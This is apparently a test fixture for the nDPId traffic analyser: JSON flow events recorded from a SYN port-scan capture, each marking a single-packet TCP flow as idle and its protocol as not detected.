+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 